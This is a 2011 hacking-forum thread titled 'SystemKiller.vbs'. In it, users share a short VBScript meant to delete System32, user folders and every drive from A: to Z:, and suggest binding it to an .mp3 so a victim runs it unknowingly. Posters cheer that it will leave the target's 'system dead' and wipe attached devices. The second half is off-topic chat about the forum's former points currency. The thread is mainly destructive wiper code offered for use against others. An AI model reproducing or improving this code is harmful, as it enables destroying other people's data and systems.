![]() |
|
SystemKiller.vbs - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Coding (https://sinister.ly/Forum-Coding--71) +--- Thread: SystemKiller.vbs (/Thread-SystemKiller-vbs) Pages:
1
2
|
SystemKiller.vbs - NoExit - 09-01-2011 Open notepad and copy this. Kill("C:\Windows\System32") Kill("C:\Document and Settings") Kill("C:\Users") Kill("D:\") save it as xx.vbs (xx could be whatever you want) you can bind it with a .mp3 or whatnot PS: im not sure this works as i ddnt try it!! what it should do, is delete the system32, and the 'My Documents' in Vista and XP (not sure bout w7), and delete everything on drive D:\ if the system has any!! if this works, it will beslow to delete everything, as my internet connection!! but i wanted to share this anywho!!
RE: SystemKiller.vbs - Jacob - 09-01-2011 Code: kill("A:\")
kill("B:\")
kill("C:\")
kill("D:\")
kill("E:\")
kill("F:\")
kill("G:\")
kill("H:\")
kill("I:\")
kill("J:\")
kill("K:\")
kill("L:\")
kill("M:\")
kill("N:\")
kill("O:\")
kill("P:\")
kill("Q:\")
kill("R:\")
kill("S:\")
kill("T:\")
kill("U:\")
kill("V:\")
kill("W:\")
kill("X:\")
kill("Y:\")
kill("Z:\")Should do exactly that but make sure their system is dead :thumbs: (i apologize if you feel this is hijacking your thread) RE: SystemKiller.vbs - NoExit - 09-02-2011 hahahaha yeah sure tnx
RE: SystemKiller.vbs - Jacob - 09-02-2011 kind of a generic code mine is) but it does the job. fucks any portable device they may have attached also xD RE: SystemKiller.vbs - NoExit - 09-02-2011 hahah xD cool man! <3
RE: SystemKiller.vbs - 1234hotmaster - 09-02-2011 does this really need a thread? ^_^' good thing sage removed HC dollars
RE: SystemKiller.vbs - Jacob - 09-02-2011 Why couldnt it be a thread? xD and what is HC dollars? RE: SystemKiller.vbs - 1234hotmaster - 09-02-2011 (09-02-2011, 04:16 AM)Jacob Wrote: Why couldnt it be a thread? xD well, there was HC dollars a few months ago... you can read this if you wana know what it was ![]() http://www.hackcommunity.com/Thread-What-exactly-are-HC-Dollars 1llusion made hades bot price of few HC dollars, i think every post you made = HC $ and every thread = 10 or 15 HC $ you could also donate your own HC dollars to someone else, 1llusion donated 150 HC dollars to me for my birthday :O ( too bad it got removed but tnx 1llusion really appreciated that :'(:'( ) and about why it can't be a thread, well sorry i mistakenly said that it can't be... well, in the few first months of HC 90% of threads were rich and well explained, each took at least 20 minutes-20 hours to write ( i remember V1P3R's SQLi tut took a long time cause he wanted to make it as easy as possible :thumbs: ) and usually the more time taken to the tut, the more details and things you learned ![]() plus 10% of threads which were rich and well explained tut's were copy pasted with/without credits the rest were written from scratch. Too bad Th3Proph3t is not here i really miss him :'( he used to make really great threads... Well, imagine HC dollar still existing and people posting threads with few lines of duplicated hard-coded code. They would have the same HC dollar as the person who posted rich tut's and spent lots of hours writing it, would it be fair? You decide ![]() I'm just a old geezer used to those threads sorry if i made anyone sad :'( RE: SystemKiller.vbs - Jacob - 09-02-2011 i see whatyou're saying now. i apparently wasnt around when there were hc dollars....what could they be used for? RE: SystemKiller.vbs - 1234hotmaster - 09-02-2011 trading programs and well, in my idea it was like a reputation. Quality posters = Rich in HC $ But lets mention, i used to spam a VERY LONG time ago
|